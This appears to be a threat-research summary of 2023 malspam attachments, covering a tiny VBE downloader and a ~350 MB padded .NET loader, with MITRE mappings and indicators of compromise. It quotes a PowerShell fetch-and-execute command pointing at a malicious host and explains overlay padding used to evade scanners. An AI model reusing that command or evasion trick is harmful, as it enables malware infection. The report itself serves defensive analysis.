Threat Research

Interesting large and small malspam attachments from 2023

Securonix

Over the past year, 1,152 potentially malicious attachments were captured, yielding 525 unique samples (285 PE files and a mix of scripts, Office files, PDFs, and more). The collection ranged from a tiny 1.32 KB VBE VBScript downloader to a ~350 MB .NET EXE with a large low-entropy overlay, illustrating that malspam often uses both tiny and gigantic payloads as first-stage loaders. #AgentTesla #PureCry #VBScript #VBE #PowerShell

Keypoints

  • 1,152 potentially malicious attachments were caught, narrowed to 525 unique samples (285 PE files; others include scripts, Office files, PDFs, etc.).
  • The smallest malicious file was a 1.32 KB VBE file named μεταβ?βαση.vbe (SHA-1 3fc13ec425b0255c737b3b88005e5cb5f9366c52).
  • The VBScript, though obfuscated, turned out to be a readable downloader; decoding revealed its function. “The VBScript – although it was still obfuscated – turned out to be quite readable…”
  • The decoded content downloaded a malicious BAT file from a remote URL via a PowerShell-based command. “Invoke-WebRequest -Uri (‘http://purecry[.]ydns[.]eu/pure/Xxqyinqnbat’) -OutFile ‘$env:TEMPXxqyinqn.bat’; & ‘$env:TEMPXxqyinqn.bat’”
  • The largest sample was a ~350 MB .NET executable with a very large, low-entropy overlay designed to evade scans, totaling 358508 kB with SHA-1 6eefbfd8b2c547fc959fcee4c38105cb997dd00d.
  • Overlays typically used to inflate size while keeping entropy low, enabling bypass of some anti-malware file-size checks; without the overlay the EXE would be ~108 kB.
  • Both extremes illustrate loaders as the first stage in malware infection chains, commonly delivered by malspam.
  • The study highlights the breadth of 2023 malspam and the ongoing risk into 2024.

MITRE Techniques

  • [T1059.001] PowerShell – VBScript decodes and executes a Base64-encoded PowerShell command to download a BAT file. ‘the VBScript tries to execute a Base64-encoded PowerShell command.’
  • [T1059.005] Visual Basic – The VBE/VBScript is used as a downloader; ‘The VBScript – although it was still obfuscated – turned out to be quite readable…’
  • [T1105] Ingress Tool Transfer – The downloader fetches a BAT payload from a remote URL. ‘downloader for a malicious BAT file’.
  • [T1105] Ingress Tool Transfer – The downloader retrieves a file from http://justnormalsite[.]ddns[.]net/SystemEnv/uploads/nodeffender_Nrtsynmz.png. ‘
  • [T1027] Obfuscated/Compressed Files and Information – The sample is obfuscated, yet its function is a downloader. ‘Although it is obfuscated, its function is quite understandable…’

Indicators of Compromise

  • [SHA-1] 3fc13ec425b0255c737b3b88005e5cb5f9366c52 – Smallest VBE file (translation: μεταβ?βαση.vbe)
  • [SHA-1] 6eefbfd8b2c547fc959fcee4c38105cb997dd00d – ~350 MB .NET EXE payload
  • [Filename] μεταβ?βαση.vbe – Smallest malicious file
  • [URL] http://purecry[.]ydns[.]eu/pure/Xxqyinqnbat – VBScript downloader target
  • [Domain] purecry.ydns.eu – Downloader host domain
  • [Domain] justnormalsite.ddns.net – Downloader host domain
  • [Filename] nodeffender_Nrtsynmz.png – Final payload image/file
  • [URL] http://justnormalsite[.]ddns[.]net/SystemEnv/uploads/nodeffender_Nrtsynmz.png – URL hosting the final payload

Read more: https://isc.sans.edu/diary/rss/30524